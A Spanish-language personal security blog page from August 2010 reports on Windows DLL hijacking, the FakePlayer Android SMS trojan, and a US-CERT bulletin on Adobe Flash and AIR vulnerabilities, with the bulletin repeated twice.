Moore identificaba el fallo mientras estaba investigando el grave problema en archivos LNK que fue conocido en Windows hace algunos días. A su vez Acros, una compañía de seguridad eslovena, hablaba de una vulnerabilidad en iTunes por la que, si se abría un archivo asociado a iTunes desde una ubicación remota, iTunes podría llegar a cargar más DLLs desde esa ubicación. HD Moore comenzó a buscar más aplicaciones que se comportasen de este modo.
Así, el problema está en múltiples aplicaciones de terceros (y propias) para Windows a la hora de cargar librerías dinámicas (archivos DLL). Si las aplicaciones no especifican las rutas completas de las librerías que necesitan, Windows podría llegar, en su búsqueda, a "encontrar" primero las librerías de los atacantes y ejecutarlas. Al principio Moore identificó unas cuarenta aplicaciones, pero en estos momentos se conocen cientos. El número, además, será mayor con el tiempo.
Todas estas herramientas no han seguido ciertas recomendaciones de seguridad a la hora de ser programas. Por tanto, un atacante podría llegar a ejecutar código si incita al usuario a abrir con una aplicación vulnerable un archivo desde una ubicación remota (compartida a través de WebDAV, SMB) o incluso una llave USB.
La novedad es que el archivo abierto no tiene por qué contener ningún exploit. La única condición es que el atacante pueda escribir una librería en la misma ruta donde se encuentra el archivo que se quiere abrir, y el programa vulnerable se encargará de cargarla.
Este tipo de ataques son denominados "binary planting", "DLL preloading" o "DLL Hijacking" y pueden verse como una nueva variante de los ataque de ruta (PATH): a no ser que se especifique exactamente la ruta de los binarios, no se sabe qué se está ejecutando; bien porque exista un archivo con un mismo nombre en un directorio, bien porque se encuentre en el PATH de sistema o, como en este caso, bien porque la aplicación llame a DLLs que no son las legítimas.
Windows arrastró este histórico error durante mucho tiempo. Pero una de las (muchas) mejoras de seguridad introducidas desde Windows XP SP1, es que por defecto, se mejora el orden de la búsqueda de librerías con el parámetro SafeDllSearchMode activado... pero el problema se da cuando las librerías no existen en el sistema y no se especifica ruta completa... el programa va a buscarlas en remoto y el atacante podría cargar así las que quisiera.
Microsoft ha creado una guía de buenas prácticas para programadores y sobre cómo cargar de forma segura librerías dinámicas, disponible desde:
Dynamic-Link Library Security (Windows)
El problema es muy grave, puesto que resulta utópico creer que el increíble número de aplicaciones vulnerables solucionarán este fallo en un periodo de tiempo razonable. Así que Microsoft anuncia contramedidas para mitigar el fallo.
No se trata de una solución en forma de parche, puesto que bloquear por completo un comportamiento adquirido durante años por los programadores, solo podría causar problemas. De hecho, la introducción de SafeDllSearchMode hace 8 años "ya" podría considerarse como la solución. En todo caso, en el aviso se dan instrucciones precisas a los administradores para deshabilitar la carga insegura de librerías por aplicación o globalmente. También se recomienda, si no es necesario, detener el servicio "Cliente web" del sistema.
Por su parte, HD Moore ha publicado una herramienta para determinar si una aplicación hace uso de este tipo de técnicas y, por tanto, es susceptible de ser usada como vector de ataque. En estos momentos, están apareciendo aplicaciones vulnerables por decenas.
Además, varios programas propios de Microsoft son también vulnerables, como Office, Mail. Y ya están apareciendo exploits públicos que permiten aprovechar el fallo con todo tipo de aplicaciones, por ejemplo, al abrir un inocente archivo Office desde una unidad remota.
Más información:
Application DLL Load Hijacking
Insecure Library Loading Could Allow Remote Code Execution
Microsoft Security Advisory (2269637): Insecure Library Loading Could Allow Remote Code Execution
lunes, 23 de agosto de 2010
Android Estrena Su Primer Troyano Mediatico =D
En los laboratorios de Kaspersky se han topado esta semana con lo que podría ser el primer espécimen que afecta, de manera significativa, al sistema operativo para dispositivos móviles de Google: Android.
Era cuestión de tiempo que una plataforma como Android, con una cuota cada vez más amplia en el mercado de los smartphones, dejara de ser ignorada por los creadores de malware. No obstante, sin explosión mediática, ya se tenía conocimiento de spyware en casos puntuales y pruebas de concepto como el rootkit presentado en la última edición de la conferencia BlackHat.
El recién bautizado SMS.AndroidOS.FakePlayer.a, con 13Kb de peso, se dedica una vez instalado en el sistema a enviar SMS indiscriminadamente números con tarificación especial. Cobrados a algo más de 4 euros el mensaje. En principio sólo parece afectar a Rusia aunque no se descarta que aparezcan versiones adaptadas a otros países.
Llega con la forma de un reproductor multimedia y cuando se instala pide permiso para efectuar operaciones de acceso a la tarjeta de memoria, envío de SMS y consulta de datos sobre el dispositivo. Autorizaciones sospechosamente poco relacionadas con la prometida funcionalidad de reproducción multimedia.
A pesar de las advertencias del sistema, este tipo de solicitudes podrían ser ignoradas por el usuario medio que no suele reparar y pensárselo mucho antes de pulsar el "Aceptar" del cuadro de diálogo.
El troyano llegó por primera vez a VirusTotal.com el 4 de agosto, sin ser detectado por ningún antivirus. Poco después fue detectado por este orden, por Dr. Web, Kaspersky y VBA32, todos de factura rusa.
Hispasecha realizado un pequeño análisis de la muestra disponible desde:
http://www.hispasec.com/laboratorio/troyano_android.pdf
Se da la circunstancia que en el mismo día, la BBC ha publicado un reportaje donde se muestra la creación de una aplicación maliciosa, entre otros smartphones para Android, con funcionalidad de spyware. A pesar de la coincidencia no está relacionado con el descubrimiento de Kaskersky. Se trata de una prueba de concepto para "demostrar lo fácil que es crear aplicaciones maliciosas para un smartphone".
Recordemos el reportaje del mismo estilo de marzo de 2009. En aquella ocasión la BBC diseminó un malware creado para la ocasión que llegó a infectar 20.000 usuarios y crear una botnet con ellos. Con tiempo es de esperar que surja más malware para este tipo de dispositivos que día a día van ganando en usuarios.
Más información:
First SMS Trojan for Android
First SMS Trojan for Android - Securelist
BBC writes smartphone spyware
BBC writes smartphone spyware, and Android malware developments Graham Cluley's blog
Analysis of Trojan-SMS.AndroidOS.FakePlayer.a
Jaime Blasco Blog : /Malware/Analysis_of_Trojan-SMS.AndroidOS.FakePlayer.a.html
Resultados de SMS.AndroidOS.FakePlayer.a en VirusTotal:
VirusTotal - Free Online Virus, Malware and URL Scanner
Etiquetas:
android,
envio masico,
envio masivo sms,
especial,
marcacion,
marcacion especial,
primer troyano android,
sms,
troyano
|
0
comentarios
domingo, 22 de agosto de 2010
Vulnerabilidades en Diferentes Productos De Adobe
De acuerdo con el Boletín de seguridad de Adobe APSB10-16, hay vulnerabilidades en Adobe Flash y AIR. Estas vulnerabilidades afectan a Flash Player, AIR, y posiblemente otros productos soportados por Flash. Un atacante remoto podría explotar estas vulnerabilidades para ejecutar código arbitrario.
Fecha de Liberación: 11-Ago-2010
Ultima Revisión: 13-Ago-2010
Fuente: US-CERT
Riesgo: *Importante Problema de Vulnerabilidad
Tipo de Vulnerabilidad: *Remoto
Ejecución Remota de Código.
Sistemas Afectados:
Adobe AIR <= 2.0.2.12610
Adobe Reader <= 9.3.3
Adobe Reader <= 9.x
AdobeFlash Player <= 10.1.53.64
AdobeFlash Player <= 9.0.277.0
I. SOLUCION
Actualización de Flash y AIR
El boletín de seguridad de Adobe APSB10-16 recomienda actualizar a Flash Player 10.1.82.76 o 9.0.280 y AIR 2.0.3. Esto actualizará el plug-in del navegador y el control ActiveX de Flash, así como el de AIR. Sin embargo, esto no actualiza el soporte Flash en Adobe Reader, Acrobat, u otros productos.
Para reducir la exposición a estas y otras vulnerabilidades de Flash, considerar las siguientes técnicas de mitigación.
- Desactivar Flash en su navegador
- Desinstalar Flash o restringir los sitios que están autorizados a ejecutar Flash. En la medida de lo posible, solamente ejecutar contenido Flash en dominios de confianza. Para obtener más información, vea "Asegurando su navegador web".
Soluciones adicionales están disponibles en la nota de la vulnerabilidad 660993 del US-CERT.
II. DESCRIPCION
El boletín de seguridad de Adobe APSB10-16 describe las vulnerabilidades de Adobe Flash que afectan a Flash Player y AIR. Estas vulnerabilidades también pueden afectar a otros productos que independientemente soportan Flash, como Adobe Reader, Acrobat, Photoshop, Photoshop Lightroom, MX Freehand y Fireworks.
Un atacante podría explotar estas vulnerabilidades convenciendo a un usuario para que abra contenido de Flash especialmente diseñado. Este contenido es comúnmente alojado en una página web, pero también se pueden incrustar en un PDF y otros documentos o proveerse como un archivo independiente.
III. IMPACTO
Si un usuario abre el contenido especialmente diseñado de Flash, un atacante remoto puede ser capaz de ejecutar código arbitrario.
Referencias :
* Boletín de seguridad de Adobe APSB10-16
* Vulnerabilidad del US-CERT VU # 660993
* Asegurando su navegador web
Fecha de Liberación: 11-Ago-2010
Ultima Revisión: 13-Ago-2010
Fuente: US-CERT
Riesgo: *Importante Problema de Vulnerabilidad
Tipo de Vulnerabilidad: *Remoto
Ejecución Remota de Código.
Sistemas Afectados:
Adobe AIR <= 2.0.2.12610
Adobe Reader <= 9.3.3
Adobe Reader <= 9.x
AdobeFlash Player <= 10.1.53.64
AdobeFlash Player <= 9.0.277.0
I. SOLUCION
Actualización de Flash y AIR
El boletín de seguridad de Adobe APSB10-16 recomienda actualizar a Flash Player 10.1.82.76 o 9.0.280 y AIR 2.0.3. Esto actualizará el plug-in del navegador y el control ActiveX de Flash, así como el de AIR. Sin embargo, esto no actualiza el soporte Flash en Adobe Reader, Acrobat, u otros productos.
Para reducir la exposición a estas y otras vulnerabilidades de Flash, considerar las siguientes técnicas de mitigación.
- Desactivar Flash en su navegador
- Desinstalar Flash o restringir los sitios que están autorizados a ejecutar Flash. En la medida de lo posible, solamente ejecutar contenido Flash en dominios de confianza. Para obtener más información, vea "Asegurando su navegador web".
Soluciones adicionales están disponibles en la nota de la vulnerabilidad 660993 del US-CERT.
II. DESCRIPCION
El boletín de seguridad de Adobe APSB10-16 describe las vulnerabilidades de Adobe Flash que afectan a Flash Player y AIR. Estas vulnerabilidades también pueden afectar a otros productos que independientemente soportan Flash, como Adobe Reader, Acrobat, Photoshop, Photoshop Lightroom, MX Freehand y Fireworks.
Un atacante podría explotar estas vulnerabilidades convenciendo a un usuario para que abra contenido de Flash especialmente diseñado. Este contenido es comúnmente alojado en una página web, pero también se pueden incrustar en un PDF y otros documentos o proveerse como un archivo independiente.
III. IMPACTO
Si un usuario abre el contenido especialmente diseñado de Flash, un atacante remoto puede ser capaz de ejecutar código arbitrario.
Referencias :
* Boletín de seguridad de Adobe APSB10-16
* Vulnerabilidad del US-CERT VU # 660993
* Asegurando su navegador web
Suscribirse a:
Entradas (Atom)
About Me
- Tony Orozco
- Mmmm, pues bien soy honesto a veces demasiado, sencillo, sincero, amo la vida y la vivo a cada instante y al limite